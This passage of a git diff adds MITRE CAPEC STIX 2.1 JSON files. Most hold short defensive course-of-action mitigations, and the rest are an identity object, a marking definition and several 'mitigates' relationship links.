+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "The only known mitigation to this attack is to avoid installing the malicious application on the device. Applications usually have to declare the schemes they wish to register, so detecting this during a review is feasible.",
+ "id": "course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-505-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3.json
new file mode 100644
index 0000000000000000000000000000000000000000..1d13eab95dab17738b4a7ce8bb8783ee8ad356fc
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--e6f49932-1010-4227-a9bd-73007cc42297",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Although less reliable, the use of the optional HTTP Referrer header can also be used to determine whether an incoming request was actually one that the user is authorized for, in the current context.",
+ "id": "course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3",
+ "modified": "2021-06-24T00:00:00.000Z",
+ "name": "coa-62-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb.json
new file mode 100644
index 0000000000000000000000000000000000000000..31cc717e4d7c6eff253db912fdcba572247f3e9b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb.json
@@ -0,0 +1,20 @@ +{ + "id": "bundle--b1ee1356-9a45-433a-a646-be5b07af7647", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", + "id": "course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-103-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8.json new file mode 100644 index 0000000000000000000000000000000000000000..402696bacadbd9e8485d77b34f1cf5c3b074d20d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--c5d8a488-aa37-4876-a7fc-c4750cdb6428", + "objects": [ + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Hard Coded Alternate DNS server in applications", + "id": "course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c.json new file mode 100644 index 0000000000000000000000000000000000000000..444b04dd26be7c01cbc419ddc6ebd74b7754d4ae --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--097405dd-1a44-47b8-9c34-be388ab6c2c4", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage security kernel modules providing advanced access control and process restrictions like SELinux.", + "id": "course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42.json new file mode 100644 index 0000000000000000000000000000000000000000..6391978474950799d968da6422409d76bfa45da6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--1a34dd48-4933-4716-8f00-d02a2c84a046", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework", + "id": "course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-109-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05.json new file mode 100644 index 0000000000000000000000000000000000000000..948027f57bdfc9828e37fe7c85166f3c2be01acc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--a90eb264-a131-435b-bac4-fadfea29ba49", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain multiple instances of the document across different privileged users for recovery and verification.", + "id": "course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-519-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd02f250-4a93-4e2e-8dc8-bd3e4abc9db8.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd02f250-4a93-4e2e-8dc8-bd3e4abc9db8.json new file mode 100644 index 0000000000000000000000000000000000000000..7a18fec7aa0d2768f78ab6f0a6de1d93b7998595 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd02f250-4a93-4e2e-8dc8-bd3e4abc9db8.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--de1f6f09-ed27-46c0-a150-bd6faacee24c", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement: Use wireless technologies to connect to external display devices.", + "id": "course-of-action--fd02f250-4a93-4e2e-8dc8-bd3e4abc9db8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e.json new file mode 100644 index 0000000000000000000000000000000000000000..34c0f75dddedd6a64511b17238d2422884331a5f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--098f97d3-52c3-4449-93fd-34cc7b568580", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.", + "id": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc.json new file mode 100644 index 0000000000000000000000000000000000000000..f62c30f3db40b16e044ae39a6726815730b62f63 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--fa20ddfb-a05f-4252-ae78-f1072bdc27c5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform input validation for all content.", + "id": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7.json new file mode 100644 index 0000000000000000000000000000000000000000..ed2b05afa9fe2f20e37c92ca4228f6296056eee9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--eee2baa1-5ec8-4acb-89b0-40e4c1c89b97", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Change default passwords by choosing strong passwords.", + "id": "course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-169-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d.json new file mode 100644 index 0000000000000000000000000000000000000000..4a71f7d0822f2a3ba224dd43a7c4695f21165d03 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--3c628647-d5ab-44f9-9d97-d5e76a1d58d5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. This is to prevent computation of business logic from user controlled input data.", + "id": "course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fdda562a-133a-447b-9a9c-764b70f09841.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fdda562a-133a-447b-9a9c-764b70f09841.json new file mode 100644 index 0000000000000000000000000000000000000000..e1697b90785aba37dc3650b93dff430ca1b3f13c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fdda562a-133a-447b-9a9c-764b70f09841.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--895a5f5b-b1b8-46de-89d6-5e946da7cc53", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design the communication system such that it associates proper authentication/authorization with each channel/message.", + "id": "course-of-action--fdda562a-133a-447b-9a9c-764b70f09841", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-216-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158.json new file mode 100644 index 0000000000000000000000000000000000000000..0906284604655a21d127c23edf2322d9b0c9e096 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--47ac5bc5-5905-4b82-ab23-9f7467ee37e5", + "objects": [ + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. Use an allowlist of acceptable classes.\n ", + "id": "course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fe9d8853-a306-4443-b34e-d9d755890734.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fe9d8853-a306-4443-b34e-d9d755890734.json new file mode 100644 index 0000000000000000000000000000000000000000..d44805965634b161a42395419bb46668186b7ac2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fe9d8853-a306-4443-b34e-d9d755890734.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--0639c56a-2d52-4c68-b887-f5cd33fbb16e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor traffic and resource usage and pay attention if resource exhaustion occurs.", + "id": "course-of-action--fe9d8853-a306-4443-b34e-d9d755890734", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa.json new file mode 100644 index 0000000000000000000000000000000000000000..afc5d01b88c145af57128c7f0088d873cc8b3cc2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--60ca9c62-4589-4d85-bf90-63e31c81e3c2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys.", + "id": "course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388.json new file mode 100644 index 0000000000000000000000000000000000000000..12d96b38f3ec0452ce3f19da07247d88fa5b3864 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--5a212ef0-8824-4d2d-b4bb-14f514f4e172", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate all untrusted data.", + "id": "course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/identity/identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd.json b/cti-ATT-CK-v13.1/capec/2.1/identity/identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd.json new file mode 100644 index 0000000000000000000000000000000000000000..5903b339ea0c6f21eaf26388c3a9060922884341 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/identity/identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd.json @@ -0,0 +1,18 @@ +{ + "id": "bundle--964ea7f7-09b1-4498-a564-b7056c8aa385", + "objects": [ + { + "created": "2023-01-30T20:40:28.791901Z", + "id": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "identity_class": "organization", + "modified": "2023-01-30T20:40:28.791901Z", + "name": "The MITRE Corporation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "identity" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/marking-definition/marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d.json b/cti-ATT-CK-v13.1/capec/2.1/marking-definition/marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d.json new file mode 100644 index 0000000000000000000000000000000000000000..7f9445b99c861aef22b2ce484493590401c0f7c9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/marking-definition/marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d.json @@ -0,0 +1,16 @@ +{ + "id": "bundle--9050ead2-1bb4-4a04-aa53-2bf5681db2ce", + "objects": [ + { + "created": "2023-01-30T20:40:28.791035Z", + "definition": { + "statement": "CAPEC is sponsored by US-CERT in the office of Cybersecurity and Communications at the U.S. Department of Homeland Security. Copyright © 2007 - 2023, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation." + }, + "definition_type": "statement", + "id": "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d", + "spec_version": "2.1", + "type": "marking-definition" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d.json new file mode 100644 index 0000000000000000000000000000000000000000..e517fc602daa83c385aac8423618b7429bf4cc6a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--b97d6962-434a-47f6-b650-26881ae8dc7b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--002041eb-05e7-4cd3-ba28-e881bb148370.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--002041eb-05e7-4cd3-ba28-e881bb148370.json new file mode 100644 index 0000000000000000000000000000000000000000..9402edf531eff5b6064d346e7bdd69362f08a3cd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--002041eb-05e7-4cd3-ba28-e881bb148370.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e1b59b91-a56a-445b-95d2-790becc11c1d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002041eb-05e7-4cd3-ba28-e881bb148370", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--426e0345-2074-48c8-9a3d-b7f7550e3712", + "spec_version": "2.1", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--002a4543-59cc-405d-b6f7-835ee0f6b124.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--002a4543-59cc-405d-b6f7-835ee0f6b124.json new file mode 100644 index 0000000000000000000000000000000000000000..09fd41f79393d7264da5bfce92f171930cd06ed3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--002a4543-59cc-405d-b6f7-835ee0f6b124.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--0646f876-8565-491a-a89d-6994b4d6125c", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002a4543-59cc-405d-b6f7-835ee0f6b124", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--177c82cf-28a6-4bec-ad88-7f539639ef51", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--00382075-fd38-4145-ac07-88fa46ab5e82.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--00382075-fd38-4145-ac07-88fa46ab5e82.json new file mode 100644 index 0000000000000000000000000000000000000000..11f631bbb250e39f39e4c68de81612fe63eac7eb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--00382075-fd38-4145-ac07-88fa46ab5e82.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--6f238872-7208-45ce-bc27-93b57cd838af", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00382075-fd38-4145-ac07-88fa46ab5e82", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--006acdf6-fa11-4dbc-b447-35cfd3577991.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--006acdf6-fa11-4dbc-b447-35cfd3577991.json new file mode 100644 index 0000000000000000000000000000000000000000..7f72756decc3f2a5a3dd475511ebe5aec267d82c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--006acdf6-fa11-4dbc-b447-35cfd3577991.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--3eb01aed-c805-4b39-833b-3fcb683adcc9", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--006acdf6-fa11-4dbc-b447-35cfd3577991", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf22f1fa-b5cb-4733-a825-810c681f76aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
